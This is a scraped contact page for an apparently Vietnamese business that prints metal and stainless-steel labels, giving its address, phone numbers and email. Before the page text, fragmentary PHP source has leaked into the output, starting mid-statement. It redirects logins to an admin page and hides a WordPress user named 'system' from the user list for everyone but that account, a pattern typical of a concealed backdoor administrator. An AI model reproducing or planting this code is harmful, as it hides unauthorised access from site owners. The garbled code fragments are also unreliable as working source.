roles ) && is_array( $user->roles ) ) { //check for admins if ( in_array( 'subscriber', $user->roles ) ) { // redirect them to the default place $redirect_to = '/wp-admin/admin.php?page=gettingstart'; return $redirect_to; } else { $redirect_to = '/wp-admin/admin.php?page=gettingstart'; return $redirect_to; } } else { $redirect_to = '/wp-admin/admin.php?page=gettingstart'; return $redirect_to; } } add_filter( 'login_redirect', 'my_login_redirect', 10, 3 ); ?>user_login; if ($username == 'system') { } else { global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != 'system'",$user_search->query_where); } } ?> Liên hệ | in tem nhãn, tem nhãn kim loại, tem nhãn inox, tem nhãn đồng, tem nhãn nhôm, tem nhãn giá rẻ
Đóng

Liên hệ với chúng tôi

Địa chỉ:184 Lê Đình Cẩn, Phường Tân Tạo, Quận Bình Tân, TP. HCM

Số điện thoại: ( 08 ) 668 48627

Di động: 0903 008 414

Email: nhankimloai@gmail.com

www.congcuquangcao.com.vn